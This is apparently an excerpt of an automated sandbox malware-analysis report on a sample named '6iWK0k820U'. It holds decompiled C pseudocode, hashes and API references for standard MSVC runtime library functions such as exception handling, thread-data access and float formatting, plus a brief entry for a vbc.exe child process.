				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x419f58);
				E0040EACC(__ebx, __edi, __esi);
				_t31 = E0040CC09(__ebx, __edx, __edi, _t35);
				_t15 =  *0x43da94; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E004100B0(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x43d998; // 0x8a1608
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x43d570;
								if(__eflags != 0) {
									_push(_t33);
									E0040BBFB(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x43d998; // 0x8a1608
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x43d998; // 0x8a1608
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E0040F14E();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0040DD45(_t29, _t31, 0x20);
				}
				return E0040EB11(_t33);
			}

0x0040f0b3
0x0040f0b3
0x0040f0b3
0x0040f0b3
0x0040f0b5
0x0040f0ba
0x0040f0c4
0x0040f0c6
0x0040f0ce
0x0040f0ef
0x0040f0f5
0x0040f0f9
0x0040f0fc
0x0040f0ff
0x0040f105
0x0040f107
0x0040f109
0x0040f10c
0x0040f112
0x0040f114
0x0040f116
0x0040f11c
0x0040f11e
0x0040f11f
0x0040f124
0x0040f11c
0x0040f114
0x0040f125
0x0040f12a
0x0040f12d
0x0040f133
0x0040f137
0x0040f137
0x0040f13d
0x0040f144
0x0040f0d6
0x0040f0d6
0x0040f0d6
0x0040f0db
0x0040f0df
0x0040f0e4
0x0040f0ec

APIs

__getptd.LIBCMT ref: 0040F0BF

Part of subcall function 0040CC09: __getptd_noexit.LIBCMT ref: 0040CC0C
Part of subcall function 0040CC09: __amsg_exit.LIBCMT ref: 0040CC19

__amsg_exit.LIBCMT ref: 0040F0DF
__lock.LIBCMT ref: 0040F0EF
InterlockedDecrement.KERNEL32(?), ref: 0040F10C
InterlockedIncrement.KERNEL32(008A1608), ref: 0040F137

Memory Dump Source

Source File: 00000000.00000002.273538608.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273527629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273555829.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273571274.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273655427.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6iWK0k820U.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 5652cfa39262f1c06bd9f406ff10a92793be0373e88e9f9211575caa1798e649
Instruction ID: 307356051d3375987b3b38b17ec1612ccfcd9be8512b0ec90070fc9e9f243a30
Opcode Fuzzy Hash: 5652cfa39262f1c06bd9f406ff10a92793be0373e88e9f9211575caa1798e649
Instruction Fuzzy Hash: 7B01A131D01612DBD730ABA6E80575A7760AF08724F15403BE408B7AD5C73CAD95CBCD

Uniqueness

Uniqueness Score: -1.00%

Function 0040C396 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 28%

			E0040C396(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E0040C304(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E0040908F(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E0040BD81(_t22, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_push(_t27);
				_push(_a4);
				_t20 = E0040BFE9(_t22,  *((intOrPtr*)(_t22 + 0xc)), _t25, _t26, _t27, _t31);
				if(_t20 != 0) {
					E00409056(_t20, _t27);
					return _t20;
				}
				return _t20;
			}

0x0040c396
0x0040c396
0x0040c396
0x0040c396
0x0040c396
0x0040c39b
0x0040c39f
0x0040c3a1
0x0040c3a4
0x0040c3a5
0x0040c3a6
0x0040c3a9
0x0040c3ae
0x0040c3ae
0x0040c3b1
0x0040c3b5
0x0040c3b8
0x0040c3bd
0x0040c3ba
0x0040c3ba
0x0040c3ba
0x0040c3c0
0x0040c3c5
0x0040c3c7
0x0040c3ca
0x0040c3cd
0x0040c3ce
0x0040c3d6
0x0040c3db
0x0040c3df
0x0040c3e2
0x0040c3e5
0x0040c3eb
0x0040c3ec
0x0040c3ef
0x0040c3f9
0x0040c3fd
0x00000000
0x0040c3fd
0x0040c403

APIs

___BuildCatchObject.LIBCMT ref: 0040C3A9

Part of subcall function 0040C304: ___BuildCatchObjectHelper.LIBCMT ref: 0040C33A

_UnwindNestedFrames.LIBCMT ref: 0040C3C0
___FrameUnwindToState.LIBCMT ref: 0040C3CE

Strings

csm, xrefs: 0040C3A5, 0040C3BA, 0040C3CD, 0040C3EB, 0040C3FB

Memory Dump Source

Source File: 00000000.00000002.273538608.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273527629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273555829.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273571274.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273655427.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6iWK0k820U.jbxd

Yara matches

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm
API String ID: 2163707966-1018135373
Opcode ID: 05b67e2245c10d14203b147b554bc30bcc828a46ba6760870895824985e537d1
Instruction ID: c36a4fb537c5a41421e4af34e9220013e97bcdee5184f063f0d2da0902c97415
Opcode Fuzzy Hash: 05b67e2245c10d14203b147b554bc30bcc828a46ba6760870895824985e537d1
Instruction Fuzzy Hash: 9F01E871000109FBDF226F52CC85EAF7E6AEF08354F108126FD18251A1D77A9971DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040BBD2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E0040BBD2() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x417f58;
					_v28 =  *0x417f50;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x0040bbd7
0x0040bbdf
0x0040bbf6
0x0040bba2
0x0040bbab
0x0040bbb7
0x0040bbba
0x0040bbbd
0x0040bbbf
0x0040bbc2
0x0040bbc7
0x0040bbd1
0x0040bbc9
0x0040bbcd
0x0040bbcd
0x0040bbe1
0x0040bbe7
0x0040bbef
0x00000000
0x0040bbf1
0x0040bbf1
0x0040bbf5
0x0040bbf5
0x0040bbef

APIs

GetModuleHandleA.KERNEL32(KERNEL32,00408FA0), ref: 0040BBD7
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040BBE7

Strings

KERNEL32, xrefs: 0040BBD2
IsProcessorFeaturePresent, xrefs: 0040BBE1

Memory Dump Source

Source File: 00000000.00000002.273538608.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273527629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273555829.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273571274.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273655427.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6iWK0k820U.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 4c94be4cbeef11973152cd54b366fe060a87161fb267bfb28090b781c02438a1
Instruction ID: 17a2e520e98f65d4a125b3b4f00d33b8153b44dd52cdb563f79c772e4a16abb1
Opcode Fuzzy Hash: 4c94be4cbeef11973152cd54b366fe060a87161fb267bfb28090b781c02438a1
Instruction Fuzzy Hash: EBF03630A0450AD3DF105BA1AC4A7AF7B78FB84745F5204A1D596B01C8DF34D076D28D

Uniqueness

Uniqueness Score: -1.00%

Function 00408E5A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E00408E5A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v0;
				signed int _v4;
				char _v40;
				char _v80;
				char* _t21;
				char* _t25;
				void* _t31;

				_t31 = __eflags;
				_push(0x44);
				E0040AF69(E004150B2, __ebx, __edi, __esi);
				E004079B0( &_v40, "invalid string position");
				_v4 = _v4 & 0x00000000;
				_t21 =  &_v80;
				E00408DD3(_t21,  &_v40);
				E0040943C( &_v80, 0x419c40);
				asm("int3");
				_push(__esi);
				_t25 = _t21;
				 *((intOrPtr*)(_t25 + 0x18)) = 0xf;
				E00408000(_t21, _t31, 0);
				E00407EA0(__ebx, _t25, __edi, _t25, _v0, 0, 0xffffffff);
				return _t25;
			}

0x00408e5a
0x00408e5a
0x00408e61
0x00408e6e
0x00408e73
0x00408e7b
0x00408e7e
0x00408e8c
0x00408e91
0x00408e97
0x00408e98
0x00408e9c
0x00408ea3
0x00408eb1
0x00408eba

APIs

__EH_prolog3.LIBCMT ref: 00408E61
std::bad_exception::bad_exception.LIBCMT ref: 00408E7E

Part of subcall function 00408DD3: std::runtime_error::runtime_error.LIBCPMT ref: 00408DDE

__CxxThrowException@8.LIBCMT ref: 00408E8C

Part of subcall function 0040943C: RaiseException.KERNEL32(?,?,0040AB87,00408B65,?,?,?,?,0040AB87,00408B65,00419B68,0043E25C,00408B65,00000000,00000000), ref: 0040947E

Strings

invalid string position, xrefs: 00408E66

Memory Dump Source

Source File: 00000000.00000002.273538608.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273527629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273555829.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273571274.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273655427.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6iWK0k820U.jbxd

Yara matches

Similarity

API ID: ExceptionException@8H_prolog3RaiseThrowstd::bad_exception::bad_exceptionstd::runtime_error::runtime_error
String ID: invalid string position
API String ID: 3299838469-1799206989
Opcode ID: fdcc819f9f3cd0250e59bfa61266c64a0bf8bbbb9efe41cd63d39c39d3ae616b
Instruction ID: f122d8c53f17326b2c9cdd9368e857345e8aecda8ab510d6109f974a770c35a7
Opcode Fuzzy Hash: fdcc819f9f3cd0250e59bfa61266c64a0bf8bbbb9efe41cd63d39c39d3ae616b
Instruction Fuzzy Hash: 19D012719542089ACB04E7E1CC82BDE7378AF18314F54402FA100760C2DBBC5A44C66D

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA9D Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040BA9D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E0040B38E(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E0040B47E(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E0040B9A3(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E0040B8E8(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x0040baa2
0x0040baa8
0x0040bb1b
0x00000000
0x0040baaf
0x0040baaf
0x0040bab2
0x0040bacd
0x0040bad0
0x0040baf0
0x0040bb02
0x0040bad2
0x0040bad2
0x0040bad5
0x00000000
0x0040bad7
0x0040bae9
0x0040bae9
0x0040bad5
0x0040bb20
0x0040bb24
0x0040bab4
0x0040bacc
0x0040bacc
0x0040bab2

APIs

__cftof_l.LIBCMT ref: 0040BAC3

Part of subcall function 0040B8E8: __fltout2.LIBCMT ref: 0040B914

__cftog_l.LIBCMT ref: 0040BAE9
__cftoe_l.LIBCMT ref: 0040BB1B

Memory Dump Source

Source File: 00000000.00000002.273538608.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273527629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273555829.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273571274.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273655427.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6iWK0k820U.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 8881f43db4934f97700ea344f7bd6a55775756258b3ec4eb4d45734f2a4a0642
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: C4116D3204014EBBCF125E85CC11CEE3F26FB08354B58852AFA5968571D33AD9B1AB89

Uniqueness

Uniqueness Score: -1.00%

Function 0040F81F Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E0040F81F(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x419f98);
				E0040EACC(__ebx, __edi, __esi);
				_t28 = E0040CC09(__ebx, __edx, __edi, _t30);
				_t13 =  *0x43da94; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E004100B0(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x43db78; // 0x43daa0
					 *((intOrPtr*)(_t29 - 0x1c)) = E0040F7E1(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E0040F889();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E0040CC09(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E0040DD45(_t25, _t26, 0x20);
				}
				return E0040EB11(_t28);
			}

0x0040f81f
0x0040f81f
0x0040f81f
0x0040f81f
0x0040f81f
0x0040f821
0x0040f826
0x0040f830
0x0040f832
0x0040f83a
0x0040f85e
0x0040f860
0x0040f866
0x0040f86a
0x0040f86d
0x0040f878
0x0040f87b
0x0040f882
0x0040f83c
0x0040f83c
0x0040f840
0x00000000
0x0040f842
0x0040f847
0x0040f847
0x0040f840
0x0040f84c
0x0040f850
0x0040f855
0x0040f85d

APIs

__getptd.LIBCMT ref: 0040F82B

Part of subcall function 0040CC09: __getptd_noexit.LIBCMT ref: 0040CC0C
Part of subcall function 0040CC09: __amsg_exit.LIBCMT ref: 0040CC19

__getptd.LIBCMT ref: 0040F842
__amsg_exit.LIBCMT ref: 0040F850
__lock.LIBCMT ref: 0040F860

Memory Dump Source

Source File: 00000000.00000002.273538608.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273527629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273555829.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273571274.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273655427.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6iWK0k820U.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: f7ff18bfc4eaefbfc3ae111a7fc5b7e66d581074c07217c2f3c1813cd1d4e455
Instruction ID: 41ca3751a24e4730fffc5b22cf12fa47f2ed85e29cbcac15d0b1d7afbd858b14
Opcode Fuzzy Hash: f7ff18bfc4eaefbfc3ae111a7fc5b7e66d581074c07217c2f3c1813cd1d4e455
Instruction Fuzzy Hash: 8FF06232A00700DBD730BBB6940278973A06F44724F60417FE405B7AD2CB7C6945CA5E

Uniqueness

Uniqueness Score: -1.00%

Function 00408100 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00408100(void* __ebx, char __ecx, void* __edi, void* __esi, char _a4, signed short _a8) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				intOrPtr _t20;
				intOrPtr _t32;

				_t44 = __esi;
				_t43 = __edi;
				_t30 = __ebx;
				_v12 = __ecx;
				_t2 =  &_v12; // 0x403173
				_t20 =  *_t2;
				_t32 =  *0x417e88; // 0xffffffff
				_t4 =  &_a4; // 0x403173
				_t45 = _t32 -  *((intOrPtr*)(_t20 + 0x14)) -  *_t4;
				if(_t32 -  *((intOrPtr*)(_t20 + 0x14)) <=  *_t4) {
					E00408E22(__ebx, __edi, __esi, _t45);
				}
				_t46 = _a4;
				if(_a4 > 0) {
					_v8 =  *((intOrPtr*)(_v12 + 0x14)) + _a4;
					if((E004082A0(_t30, _v12, _t43, _t44, _t46, _v8, 0) & 0x000000ff) != 0) {
						E00408590(_v12,  *((intOrPtr*)(_v12 + 0x14)), _a4, _a8 & 0x0000ffff);
						E00408240(_v12, _v8);
					}
				}
				return _v12;
			}

0x00408100
0x00408100
0x00408100
0x00408106
0x00408109
0x00408109
0x0040810c
0x00408115
0x00408115
0x00408118
0x0040811a
0x0040811a
0x0040811f
0x00408123
0x0040812e
0x00408144
0x00408159
0x00408165
0x00408165
0x00408144
0x00408170

APIs

std::_String_base::_Xlen.LIBCPMT ref: 0040811A

Part of subcall function 00408E22: __EH_prolog3.LIBCMT ref: 00408E29
Part of subcall function 00408E22: std::bad_exception::bad_exception.LIBCMT ref: 00408E46
Part of subcall function 00408E22: __CxxThrowException@8.LIBCMT ref: 00408E54

Strings

s1@, xrefs: 00408109
s1@, xrefs: 00408115

Memory Dump Source

Source File: 00000000.00000002.273538608.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273527629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273555829.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273571274.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273655427.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6iWK0k820U.jbxd

Yara matches

Similarity

API ID: Exception@8H_prolog3String_base::_ThrowXlenstd::_std::bad_exception::bad_exception
String ID: s1@$s1@
API String ID: 4236686690-509555147
Opcode ID: 4a6183386f90f07fa4c4e65214025bf412663a58d40cca744cd4a8af9a1261cb
Instruction ID: 77f0c730808430c0476d735a4296c2b35ba6ee1eb31c366ca81a76a8762f6fb5
Opcode Fuzzy Hash: 4a6183386f90f07fa4c4e65214025bf412663a58d40cca744cd4a8af9a1261cb
Instruction Fuzzy Hash: 8201C075904108EFCB08DF95D9919AEBBB5EF48300F1081ADF9856B381CB34EE91CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040C10F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E0040C10F(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t28;
				void* _t29;

				_t30 = __eflags;
				_t28 = __esi;
				_t27 = __edi;
				_t26 = __edx;
				_t19 = __ebx;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E0040938A(__ebx, __edx, __edi, __esi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E0040CC09(__ebx, __edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E0040CC09(_t19, _t26, _t27, _t30);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
								_t17 = E00409363(_t37,  *((intOrPtr*)(_t28 + 0x18)));
								_t38 = _t17;
								if(_t17 != 0) {
									_push( *((intOrPtr*)(_t29 + 0x10)));
									_push(_t28);
									return E0040BEA7(_t38);
								}
							}
						}
					}
				}
				return _t17;
			}

0x0040c10f
0x0040c10f
0x0040c10f
0x0040c10f
0x0040c10f
0x0040c112
0x0040c118
0x0040c126
0x0040c12c
0x0040c134
0x0040c140
0x0040c148
0x0040c150
0x0040c164
0x0040c166
0x0040c16a
0x0040c16f
0x0040c175
0x0040c177
0x0040c179
0x0040c17c
0x00000000
0x0040c183
0x0040c177
0x0040c16a
0x0040c164
0x0040c150
0x0040c184

APIs

Part of subcall function 0040938A: __getptd.LIBCMT ref: 00409390
Part of subcall function 0040938A: __getptd.LIBCMT ref: 004093A0

__getptd.LIBCMT ref: 0040C11E

Part of subcall function 0040CC09: __getptd_noexit.LIBCMT ref: 0040CC0C
Part of subcall function 0040CC09: __amsg_exit.LIBCMT ref: 0040CC19

__getptd.LIBCMT ref: 0040C12C

Strings

csm, xrefs: 0040C13A

Memory Dump Source

Source File: 00000000.00000002.273538608.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273527629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273555829.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273571274.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273655427.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6iWK0k820U.jbxd

Yara matches

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: f27be2a6cce1dea113f21df7c239339f8d42f9ded0ae16fe9de1985bb3b11bf9
Instruction ID: 5d5c4484a5bc0950e14d39d6bf96d7c4be897f2fd7c9f5bd0ce5367d082162f6
Opcode Fuzzy Hash: f27be2a6cce1dea113f21df7c239339f8d42f9ded0ae16fe9de1985bb3b11bf9
Instruction Fuzzy Hash: 18012834804206DACF249F76D4906AEB7B5AF14315F24467FE844BA3D2CF399D85CE49

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exePID: 5980, Parent PID: 5796COMMON

Execution Graph

Execution Coverage:	14.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	102
Total number of Limit Nodes:	6

Executed Functions

Function 0687FEEA Relevance: 1.5, APIs: 1, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL ref: 0687FF4F

Memory Dump Source

Source File: 00000002.00000002.383004882.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6870000_vbc.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: afc4a0779e974d17d2972fe876858a58f9662668f8347be3b4e4d632196643dd
Instruction ID: e9a76954a91c106e1b0ce0ec83abae8460fa8c75bb2bec37c6a4641bd14a6f89
Opcode Fuzzy Hash: afc4a0779e974d17d2972fe876858a58f9662668f8347be3b4e4d632196643dd
Instruction Fuzzy Hash: CC1106B5C002498FDB10CF9AD449BDEBFF4EB49324F24841AD519A3210D775A544CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0687FEF0 Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL ref: 0687FF4F

Memory Dump Source

Source File: 00000002.00000002.383004882.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6870000_vbc.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 027d0ec7d48ec53df58311514c721f27788c317e840ff7564a53d78cf21131c9
Instruction ID: 6ee8d956649bae85898770a858ca3e51529e5210d6b19fca2c98f8c642b6afbc
Opcode Fuzzy Hash: 027d0ec7d48ec53df58311514c721f27788c317e840ff7564a53d78cf21131c9
Instruction Fuzzy Hash: 061115B58002498FCB10CF9AD448BDEBFF4EB49324F24841AD519A3200D779A544CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C3D820 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.378937921.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c3d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d4112bf413d2fc8f30c66e06119213b56a7e401152684220d76f13baddb22c6
Instruction ID: 6968e6cc1b0d0892b0ca6c4536b1c1daf7dbb6073a6de58afde5e15063fb77de
